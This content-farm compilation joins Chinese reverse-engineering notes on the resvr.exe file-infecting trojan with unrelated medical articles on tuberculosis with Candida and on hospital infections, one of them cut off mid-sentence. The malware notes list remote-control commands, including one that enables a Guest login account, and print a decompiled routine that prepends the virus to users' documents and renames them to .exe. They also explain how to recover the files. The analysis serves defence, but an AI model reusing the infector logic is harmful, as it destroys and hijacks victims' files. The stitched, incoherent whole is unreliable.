一个感染型木马病毒分析

| 收藏本文 下载本文 作者:黑眼圈的橙子

下面小编给大家整理一个感染型木马病毒分析(共含6篇),希望大家喜欢!同时,但愿您也能像本文投稿人“黑眼圈的橙子”一样,积极向本站投稿分享好文章。

一个感染型木马病毒分析

篇1:一个感染型木马病毒分析(二)

前面的分析中已经分析过了,该感染型木马病毒会在用户的电脑上创建socket套接字作为service端,等待病毒作者client端的连接。这样病毒作者就能远程控制用户的电脑(这里的“控制”是操作的意思)也就说,病毒作者能够通过socket套接字向用户的电脑发送控制命令CmdMsg,指挥病毒resvr.exe对用户的电脑进行恶意的破坏。

病毒resvr.exe在用户的电脑上创建监听绑定本地IP=127.0.0.1的套接字端口号为40118,将用户的电脑变成了病毒作者能控制的service服务端。

病毒resvr.exe创建的本地监听套接字成功之后,等待接收病毒作者client方发来的控制命令CmdMsg,对用户的电脑进行恶意的操作。

病毒作者对用户电脑的远程控制操作有9组命令并且对用户电脑的控制操作也比较多,后面会详细的分析每一种远程控制命令的操作。对于病毒作者client端发来的控制命令的recvCmdMsgBuffer的数据格式为“dwCmdMsg+数据内容”即接受到的数据的前8个字节是病毒作者控制用户电脑的具体的命令类型也就是下面的9组命令类型。

第1组dwCmdMsg=0x3EB的控制操作:

很简单,向病毒作者的client端发送控制操作结果的反馈信息例如21 43 65 87 (4个字节)的数据。

第2组dwCmdMsg=0x450的控制操作:

根据病毒作者client端发来的数据创建C:\Program Files\Common Files\Microsoft Shared\Index.bat文件,系统本地提权瞬间关闭用户的计算机进行掩饰。

第3组dwCmdMsg=0x451的控制操作:

根据病毒作者client端发来的数据创建C:\Program Files\Common Files\Microsoft Shared\Index.bat文件,然后创建线程用于创建用户系统桌面右下角的弹窗对话框。

第4组dwCmdMsg=0x455的控制操作:

设置当前病毒进程感染用户文件的感染方式的标记 0xAABBCCDD,遍历用户电脑的所有逻辑盘里的文件进行“加密”方式的感染用户的所有文件。创建线程对用户电脑的26个软盘“ABCDEFGHIJKLMNOPQRSTUVWXYZ”里的.doc、.xls、.jpg、.rar格式的文件进行感染处理。

对用户文件的感染方式1,对用户文件的头0x400个字节进行xor异或的加密处理,

对用户文件的感染方式2,仅仅对用户的.doc、.xls、.jpg、.rar格式的文件进行感染处理。

第5组dwCmdMsg=0x453的控制操作:

创建线程用于使用DOS入侵的命令数据创建C:\\Program Files\\Common Files\\Microsoft Shared\\X.bat文件用。执行DOS入侵命令在用户的电脑上创建拥有更大权限的系统登录账户Guest。

第6组dwCmdMsg=0x458的控制操作:

创建线程用于获取当前病毒进程资源类型为RT_RCDATA且资源名称ResourceName = 0x69=105的资源数据,创建“Message.exe”文件然后运行该病毒文件Message.exe创建病毒进程。对于病毒文件Message.exe,后面详细分析。

第7组dwCmdMsg=0x7的控制操作:

对于控制命令“7”,应该比较熟悉了吧。前面的病毒分析中提到病毒母体resvr.exe感染文件产生的衍生病毒会发送命令数据“7”。具体的病毒行为是对病毒作者client端或者病毒母体resvr.exe感染文件产生的衍生病毒client端发送的“7+文件路径”中指定文件路径的.doc、.xls、.jpg、.rar格式的文件进行感染处理即对感染病毒作者或者衍生病毒指定的.doc、.xls、.jpg、.rar格式的文件进行感染。

第8组dwCmdMsg=0x452的控制操作:

向0x451中在用户桌面右下角创建的弹窗对话框投递WM_CLOSE消息,用以关闭在用户桌面右下角创建的弹窗对话框。

第9组dwCmdMsg=0x454的控制操作:

创建线程用于创建“C:\\Program Files\\Common Files\\Microsoft Shared\\X.bat”文件并运行X.bat文件退出 Guest系统登录账户。

篇2:一个感染型木马病毒分析(二)

弹一个MessageBox的对话框,然后创建X.bat文件删除病毒进程文件Message.exe自身,退出病毒进程。

截图太多,排版看起来比较乱,个人笔记而已。

说实话,对于一份病毒分析报告而言,写的太详细不是好事。对于看病毒分析报告的小白来说,你写的越详细,意味着他看的越迷糊。病毒分析报告不是为了炫耀,只要像360的分析报告一样,简洁将病毒行为说明白即可。对于病毒的逆向,当然,IDA的伪代码质量比较高就看伪代码,不要为了显示自己很牛掰,搞些汇编的截图过来,因为那说明不了什么,工具的作用是为了提高效率不是为了炫耀。

篇3:IV型肺结核合并白色念珠菌感染分析

41例IV型肺结核合并白色念珠菌感染分析

IV型肺结核患者因肺组织和肺功能受到不同程度的损害,加之使用抗生素、激素药物不当,使机体免疫功能下降,条件致病的真菌成为致病菌,尤其是白色念珠菌最为常见,成为临床上颇为棘手的问题。我院1月至6月诊治IV型肺结核合并白色念珠菌感染41例,现分析如下。

1、材料与方法

1.1  一般资料   41例继发型肺结核均按全国结核病诊断标准。白色念珠菌感染确诊标准:从深部咳出的痰连续3次直接光镜检查至菌丝和芽孢,且培养得到同一种的白色念珠菌。男34例,女7例,年龄44-81岁,平均66.7岁,病程最短2年,最长40年,平均17.9年;咳嗽41例(100%),咳痰41例(100%),气促32例(78.05%),发热28例(68.29%),肺部干、湿罗音31例(75、61%消瘦10例(24、39%)。合并症:慢性肺源性心脏病23例(56、10%),矽肺3例(7、31%),II型糖尿病2例(4、88%),脑梗塞中风2例(4、88%)。胸片:在抗结核、抗炎治疗过程中出现原发灶外局限性或弥漫性肺部浸润性阴影,沿支气管分布

1、1    药物使用情况  喹诺酮类35例次(31、53%),头孢菌素类+酶抑制剂29例次(26、13%),氨基酸甙类26例次(26、43%),青霉素类+酶抑制剂21例次(18、92%),糖皮质激素16例次(39。02%)。半数以上的患者使用药物时间10天以上。

2、讨论

白色念珠菌是念珠菌中最常见的条件致病菌,且到处病力最强,肺部是白色念珠菌感染的好发部位,占所有深部白色念珠菌感染的50%以上,肺结核合并白色念珠菌感染与以下因素有关。

2、1  本组中多为老年男性病人,最大年龄为81岁,机体抵抗力明显下降,尤其是机体细胞免疫功能降低,且老年人对疾病的感知度差,往往待疾病较为严重才到医院就诊。

2、2   肺部严重病变,病程长,肺部正常组织破坏严重,气体交换受损,机体长期处于缺氧状态,使机体其他器官也受到损害,特别是免疫器官和组织也受到损害。另外,长期反复感染,致支气管、肺部遭到破坏,痰液引流不畅,易致反复感染,形成恶性循环,这是白色念珠菌感染的基础,本组41例均属于IN型肺结核,平均病程达17、9年,充分说明这个问题。

2、3    由于感染存在,长期使用抗生素,使机体呼吸道寄生的.白色念珠菌与宿主之间发生了很在变化,人体正常免疫功能受到破坏,发生呼吸道继发性真菌感染,特别是仅仅用抗生素治疗,而没有采取综合措施时,更易发生,待出现过敏性症状时,加用激素,加重了白色念珠菌的感染,从本组病例看,以应用喹诺酮类药物,及第三代头孢霉素,联合用药最为常见。

2、4   营养状况差,合并症多。由于基础疾病较重,病情多次反复,胃肠道紊乱,结核杆菌致机体植物神经功能率乱,使蛋白质的分解代谢,机体逐渐消瘦,营养状况日况愈下,营养状况差致同体的免疫功能受到损害,淋巴细胞数量下降,尤其是辅助性T细胞下降明显,巨噬细胞吞噬功能降低。由于合并症存在,特别是这些合并症能使机体抵抗力降低,细胞免疫功能下降,这也是遭受白色念珠菌菌感染的基础,本组各种合并症为30例(71%)。

综上所述,肺结核合并白色念珠菌感染是一个综合因素造成 结果,只有机体抵抗力低下或正常呼吸道菌群失调,才引起白色

[1] [2]

篇4:一个感染性木马病毒分析(三)文件的修复

一、序言

前面的分析一个感染型木马病毒分析(二)中,已经将该感染性木马病毒resvr.exe木马性的一面分析了一下,下面就将该感染性木马病毒resvr.exe感染性的一面分析一下,

二、文件感染方式的分析

之前感染性木马病毒的分析中,已经提到了病毒对于用户文件的感染方式有2种,分别是加密文件和感染文件传播病毒,至于文件感染的时候采取哪种感染方式,病毒母体文件和病毒母体衍生病毒文件中都有相关的标志位。

第1种感染文件的方式

前面分析的感染性木马病毒的木马性一面的过程中有下面一组远程控制命令RevCmdBuffer(如图)设置病毒进程感染文件的感染方式的标记0xAABBCCDD。

在后面病毒进程感染用户文件的时候,有对感染文件方式的判断,具体的判断依据是感染标记0xAABBCCDD(如图)。当地址0x402120处的感染标记为0xAABBCCDD时,采用第一种感染文件的方式感染(加密文件的方式)。

第1种感染文件的方式的具体方法是 不对用户系统磁盘里的文件的格式进行筛选,只要是用户系统磁盘里的文件就进行加密处理。打开用户文件,创建内存映射,以先异或后加4的方式对用户文件的头0x400个字节的数据进行加密处理。

第2种感染文件的方式

当地址0x402120处没有感染标记0xAABBCCDD时,采用第2种感染文件的方式(感染文件传播病毒)。这种感染文件的方式 会对用户系统磁盘里的文件进行筛选,仅仅对用户系统磁盘里的.doc、.xls、.jpg、.rar格式的文件进行感染处理。

病毒母体文件resvr.exe感染.doc、.xls、.jpg、.rar格式的用户文件的具体过程如下面的代码。

int __stdcall InfectedFileOfHide_4035BD(LPCSTR lpUserFilePath, int lpUserFileEx, int nNumber){ int _hUserFile; // eax@1 signed int nUserFileSize; // eax@2 HANDLE hModuleVirusesFile; // eax@5 DWORD nVirusesModulesize; // eax@5 HGLOBAL lpMemoryAlloc; // eax@5 HGLOBAL __lpMemoryAlloc; // esi@7 __int64 nFileExFilexOffset; // rax@7 CHAR *lpUserFilePathBuffer; // edi@7 int lpUserFilePathPtr; // edi@9 DWORD NumberOfBytesWritten; // [sp+0h] [bp-228h]@7 DWORD NumberOfBytesRead; // [sp+4h] [bp-224h]@7 LPCVOID _lpMemoryAlloc; // [sp+8h] [bp-220h]@7 DWORD nVirusesAndUserFileSize; // [sp+Ch] [bp-21Ch]@5 DWORD _nUserFileSize; // [sp+10h] [bp-218h]@2 DWORD nNumberOfBytesVirusesFileToRead; // [sp+14h] [bp-214h]@5 HANDLE hUserFile; // [sp+18h] [bp-210h]@2 HANDLE hVirusesHandle; // [sp+1Ch] [bp-20Ch]@5 CHAR szUserFilePathBuffer; // [sp+20h] [bp-208h]@7 CHAR FileVirusesName; // [sp+124h] [bp-104h]@5 // 打开需要感染处理的用户文件 _hUserFile = (int)CreateFileA(lpUserFilePath, 0xC0000000, 0, 0, 3u, 0x80u, 0); if (_hUserFile != -1) { hUserFile = (HANDLE)_hUserFile; // 获取需感染用户文件的大小 nUserFileSize = GetFileSize((HANDLE)_hUserFile, &_nUserFileSize); // 当用户文件大小大于0x8000000或者大于4G时,不感染用户文件 if (nUserFileSize >0x8000000 || _nUserFileSize) { _hUserFile = CloseHandle(hUserFile); } else { _nUserFileSize = nUserFileSize;// 获取当前病毒进程模块的名称 GetModuleFileNameA(0, &FileVirusesName, 0x104u);// 打开当前病毒进程的文件 hModuleVirusesFile = CreateFileA(&FileVirusesName, 0x80000000, 3u, 0, 3u, 0x80u, 0); hVirusesHandle = hModuleVirusesFile; // 获取当前病毒进程文件的大小 nVirusesModulesize = GetFileSize(hModuleVirusesFile, &nNumberOfBytesVirusesFileToRead); nNumberOfBytesVirusesFileToRead = nVirusesModulesize;// 病毒进程感染用户文件之后,感染文件的总文件大小。 nVirusesAndUserFileSize = _nUserFileSize + nVirusesModulesize; // 根据感染后文件的大小,申请内存空间 lpMemoryAlloc = GlobalAlloc(0x40u, _nUserFileSize + nVirusesModulesize); if (lpMemoryAlloc) { _lpMemoryAlloc = lpMemoryAlloc; __lpMemoryAlloc = lpMemoryAlloc;// 读取当前病毒进程的全部的PE文件数据到刚申请的内存中 ReadFile(hVirusesHandle, lpMemoryAlloc, nNumberOfBytesVirusesFileToRead, &NumberOfBytesRead, 0); // 读取需要被感染用户文件的全部数据追加到内存的后面即紧接着在内存缓冲区后面存放原用户文件的数据 ReadFile(hUserFile, (char *)__lpMemoryAlloc + nNumberOfBytesVirusesFileToRead,_nUserFileSize, &NumberOfBytesRead, 0); // 在标志[0040]=11 11 11 11处即申请内存中,保存被感染用户文件的大小。 setFileInfor_403B61((int)&_nUserFileSize, (int)_lpMemoryAlloc, dword_402000, (int)&_nUserFileSize, 4); // // 在标志[0040]=22 22 22 22处即申请内存中,保存被感染用户文件的原后缀名。 LODWORD(nFileExFilexOffset) = setFileInfor_403B61( (int)&lpUserFileEx, (int)_lpMemoryAlloc, dword_402008, (int)&lpUserFileEx, 4); // 提取被感染用户.doc、.xls、.jpg、.rar格式文件的图标资源, // 然后将感染后用户文件的资源图标修改为提取到被感染用户.doc、.xls、.jpg、.rar格式文件的图标, SetUserFileIcon_403573(nFileExFilexOffset, (int)_lpMemoryAlloc, nNumber); // 设置被感染用户文件的文件指针在文件头。 SetFilePointer(hUserFile, 0, 0, 0); // 将申请的内存中的(病毒母体文件的数据+被感染用户文件的数据)重新写回到被感染用户文件中 // 此时感染后的用户文件变成了病毒母体衍生病毒文件 WriteFile(hUserFile, _lpMemoryAlloc, nVirusesAndUserFileSize, &NumberOfBytesWritten, 0); // 释放申请的内存空间 GlobalFree((HGLOBAL)_lpMemoryAlloc);// 关闭文件句柄 CloseHandle(hVirusesHandle); CloseHandle(hUserFile); // 保存被感染用户文件的路径字符串到szUserFilePathBuffer中。 RtlMoveMemory(&szUserFilePathBuffer, lpUserFilePath, 0x104); lpUserFilePathBuffer = &szUserFilePathBuffer;// // 设置被感染用户文件路径字符串的指针到末尾。 while (*lpUserFilePathBuffer++ != 0) ; *lpUserFilePathBuffer = 0; // 将被感染用户文件路径字符串指针指向文件后缀名字符的位置如“.xls”的首地址处 lpUserFilePathPtr = (int)(lpUserFilePathBuffer - 5); // 将感染后的用户文件的文件后缀名改为“被感染用户文件的原文件名.exe” *(_DWORD *)lpUserFilePathPtr = 'exe.'; // 修改被感染用户文件的文件名称为“被感染用户文件的原文件名.exe”并将感染后的衍生病毒文件释放到被感染用户原文件路径下。 _hUserFile = MoveFileA(lpUserFilePath, &szUserFilePathBuffer); if (!_hUserFile) { _hUserFile = GetLastError; // 如果被感染用户原文件路径下,已经存在“被感染用户文件的原文件名.exe”文件。 if (_hUserFile == 0xB7){// 恢复被感染用户文件的路径为原路径字符串即 “被感染用户文件原文件名.被感染用户文件原后缀名”*(_DWORD *)lpUserFilePathPtr = lpUserFileEx;// 修改被感染用户文件的路径字符串为“被感染用户文件原文件名.被感染用户文件原后缀名.exe”*(_DWORD *)(lpUserFilePathPtr + 4) = 'exe.';*(_DWORD *)(lpUserFilePathPtr + 8) = 0;// 在被感染用户原文件的路径下,创建“被感染用户文件原文件名.被感染用户文件原后缀名.exe”的衍生病毒文件。_hUserFile = MoveFileA(lpUserFilePath, &szUserFilePathBuffer); } } } else { //关闭文件句柄 CloseHandle(hVirusesHandle); _hUserFile = CloseHandle(hUserFile); } } } return _hUserFile;}

病毒母体文件resvr.exe感染.doc、.xls、.jpg、.rar格式的用户文件的具体流程如下。

三、被感染文件的修复

第1种感染方式文件的修复

对于被第1种感染方式处理的用户文件的修复比较简单,只需遍历被加密的用户文件,以内存映射的方式打开文件,对打开文件的头0x400个字节的数据的进行先减4(字节类型)后异或0x5FF80F64(DWORD型)的处理即可修复被感染加密处理的用户文件。修复被感染文件的难点是如何判断用户的文件是被这种感染方式处理的。

第2种感染方式文件的修复

这个感染方式对用户.doc、.xls、.jpg、.rar格式的文件的感染,其实就是病毒母体resvr.exe产生衍生病毒即产生病毒载体的过程。只要将上面提到的病毒感染用户文件的过程理解清楚了,恢复文件也不能。

病毒母体文件resvr.exe与衍生病毒载体的文件对比。

将病毒母体文件“resvr.exe”与衍生病毒文件“石林.xls.exe”进行16进制的对比,发现两处不同。

文件对比结果的第1处不同是恢复感染用户文件的关键,具体的说明如图。

当为病毒母体文件resvr.exe时,标记 1--0x11111111后面的值是0xFFFFFFFF,标记 2--0x22222222后面保存的默认文件后缀名为.xls。

当为衍生病毒文件时,标记 1--0x11111111后面的值是被感染用户文件原文件的大小,标记 2--0x22222222后面保存的被感染用户文件原文件的后缀名。

文件对比结果的第2处不同,对于恢复被感染的用户文件也是有帮助的。

病毒母体文件resvr.exe的大小为0x11200,在衍生病毒文件中从文件偏移FileOffset=0x11200到文件结尾的数据就是被用户感染.doc、.xls、.jpg、.rar格式的文件原文件的数据。

恢复方法总结

一、.获取被感染用户文件的原文件的大小

方法1、通过在衍生病毒文件中搜索0x11111111的位置即可获取原文件的大小,因为被感染用户文件原文件的字节大小信息保存在该位置+4的地方;

方法2、直接定位衍生病毒文件的偏移0x400的位置找到0x1111111,该位置+4的地方就是被感染用户文件原文件的字节大小的信息。

二、获取被感染用户文件的原文件的文件类型

方法1、通过在衍生病毒文件中搜索0x22222222的位置即可获取被感染用户文件原文件类型字符串,因为被感染用户文件原文件类型字符串信息保存在该位置+4的地方;

方法2、直接定位衍生病毒文件的偏移0x408的位置找到0x22222222,该位置+4的地方就是被感染用户文件原文件类型字符串信息。

三、获取被隐藏的原文件的文件的数据

由于衍生病毒隐藏用户文件的方式很简单,直接将用户文件(要被感染的用户文件原文件)紧接着放在病毒母体文件数据的后面,并将用户文件(要被感染的用户文件原文件)信息保存在病毒母体的文件数据中,并且病毒母体文件的大小为0x11200。

病毒母体文件数据(保存了被感染用户文件的信息)0x11200

被感染用户文件的原文件数据

因此,只要读取衍生病毒文件中病毒母体文件数据后面即文件偏移0x11200以后至文件末尾的数据,再重新创建一个文件被感染用户文件的原文件就可恢复了。

感染性木马病毒详细的分析完了,笔记也完成了,过程还是快乐的,加油!

篇5:感染性的木马病毒分析之KWSUpreport.exe

一、病毒样本简述

初次拿到样本KWSUpreport_感染.exe.v文件,通过使用PE工具,并不能辨别出该样本是那种感染类型,使用了一个比较直接的方法,从网上查资料,获取到了该样本的正常EXE文件的一些信息,资料表明:KWSUpreport.exe是版金山网盾程序的一个上传用户报告的程序模块,因此从网上下载了该版本的金山网盾程序,获取到了正常的KWSUpreport.exe文件,经过OD的调试以及与感染KWSUpreport.exe文件的对比,能够确定获取到的KWSUpreport.exe文件是该感染样本的正常文件,

下面使用StudPE工具查看感染KWSUpreport.exe文件与正常KWSUpreport.exe文件的不同,感染文件和正常的文件的文件头的信息不同,主要表现在:

1. 程序的入口点发生了改变

2. 整个PE文件的镜像大小改变了

注意:PE文件的区段的数量没有改变

感染文件和正常的文件的区段信息不同,主要表现在:

1. 区段的RVA发生了改变

2. 区段的大小发生了改变

注意:变化的部分主要集中在.text段即代码段

结论:初步可以判定样本文件KWSUpreport.exe的感染类型为节缝隙插入代码的感染。

二、病毒样本的具体分析

正常文件的OEP为00014F9D,感染文件的OEP为00015359.

对感染文件进行具体的分析:

==========================================================================

附上获取Kernel32的基址的函数GetKernel32Instance的分析:

==========================================================================

从重定位的代码位置拷贝到申请堆内存空间0015C010的代码,大小为720H字节的大小,如下图:

==========================================================================

附上重定位函数DoRelocateFun的分析:

==========================================================================

下面对关键函数0015C240进行具体的分析:

地址00415359处的代码的对比:

对创建线程的回调函数0015C50进行具体的分析:

篇6:医院感染调查分析

医院感染调查分析

医院感染调查分析

目的:调查和了解不同科室、专业、疾病发生医院感染的具体情况,以制定相应的控制和预防方案。?

方法:对本院内一科(收治心血管、结缔组织、内分泌疾病)、内二科(收治消化道、泌尿系、血液系统疾病)、外一科(腹部外科)、外二科(骨外)、外三科(心胸、泌尿外科)、神经科、妇产科、眼科、儿科、中医科、耳鼻喉科、口腔科进行回顾性调查,调查对象为1999年7月至2000年12月在以上科室住院48小时以上的患者共10734例,其中男性患者7901例,女性患者2833例。医院感染的诊断按照“有潜伏期的疾病从入院第1天起,超过平均潜伏期所发生的感染,无明确潜伏期的疾病从入院第1天起,超过48小时所获得的感染”,实验室检查主要依据病原体培养、抗原抗体检查、X线检查等。医院感染部位的诊断标准参照王枢群等编著的《医院感染的诊断标准》。

结果:1.?各科室医院感染发病情况:在10734例住院患者中,共发生医院感染病人612例(658例次),感染病例发病率为5.70%,感染例次发病率为6.13%。发病率较高的科室依次为:内一科(15.33%)、中医科(10.25%)、神经科(9.81%)、内二科(8.72%),其次是外一科、外二科、儿科、妇科、口腔科、外三科、耳鼻喉科、眼科(见表1略)。2.?医院感染的部位构成:除去上呼吸道感染外,以下呼吸道、手术伤口、胃肠道、泌尿道感染最为常见,依次为22.04%、13.98%、8.36%、6.84%,以血液感染最为少见,只有1.82%(见表2略)。3.?医院感染的原发疾病分类:以血液、造血系统疾病发生率最高,医院感染发生率为38.15%,其次为结缔组织疾病(14.32%)、脑血管疾病(9.35%)、循环系统疾病(8.55%)、消化系统疾病(7.47%)、恶性肿瘤(7.33%),以良性肿瘤及结缔组织疾病最少(见表3略)。结论:1.?从院内感染的科室分布情况看,发病率较高的几个科室依次为内一、中医、神经、内二科,而以眼科、胸外科较低。我院内一科主要收治循环、内分泌、免疫系统及血液系统疾病,机体免疫功能障碍较大,加之激素及其他免疫抑制药物的使用,造成感染机会增多。慢性病患者、长期患病迁延不愈、住院时间较长均增加医院感染的机会。神经科的感染多以管血病尤其是活动不便、长期卧床及昏迷、各种插管的患者为主,常常发生肺部感染及泌尿系统感染、褥疮等。因而,对以上科室的住院患者应加强全身支持治疗,加强基础护理,保持住院环境清洁卫生,当应用免疫抑制药物时应加用有效的抗生素,尽量避免有关医院感染的一切诱因。2.?本组612例医院感染的部位中,以下呼吸道、手术伤口、胃肠道、泌尿道感染最多见,与全国、全省、监测资料报告相一致。下呼吸道感染主要发生在内科及神经科,手术伤口感染以外一(腹外科)多见,胃肠道感染则以儿科、内二科多见。考虑与原发病、抗生素的`滥用、陪人过多、病房内空气不洁净及护理不当(如未及时翻身、拍背排痰)等因素有关。提示我们在今后的工作中要多花精力控制以上诸因素,建立病人感染档案,加强预防及控制工作。3.?在我院外科手术伤口感染中,Ⅰ级伤口感染率为1.1%,明显高于卫生部有关综合医院管理标准所规定的<0.5%的规定。无菌切口感染与患者原发病、免疫功能、术前皮肤准备、无菌技术、手术技巧及手术持续时间、术中使用器械及液体的洁净度、抗生素的应用等因素密切相关。为减少院内感染的发生,必须注意以下几点:①严格无菌操作,提高手术技术水平,缩短术前准备及手术时间。②加强手术室环境的管理,保证术中室内空气的净化。③加强手术室、供应室的常规消毒和隔离工作,确保术中器械物品的无菌质量。④尽量减少手术室内的参观人数,严格限制其活动范围。⑤合理应用抗生素,尤其应尽量避免预防性用药,减少耐药菌株的发生。⑥手术后对病人要严密监测医院感染征象,及时采取正确的控制措施。

安徽省猪圆环病毒2型感染的流行病学调查

感染工作计划

雅思考试作文写作:分析型和一边倒

分析型CRM的智能信息架构

“最牛作文”已成木马病毒关键词

口腔科门诊医院感染控制与管理分析论文

旧型直排式热水器改制的技术分析

医院感染工作计划

医院感染论文范文

因为爱,而感染

一个感染型木马病毒分析(合集6篇)

欢迎下载DOC格式的一个感染型木马病毒分析,但愿能给您带来参考作用!
推荐度: 推荐 推荐 推荐 推荐 推荐
点击下载文档 文档为doc格式
点击下载本文文档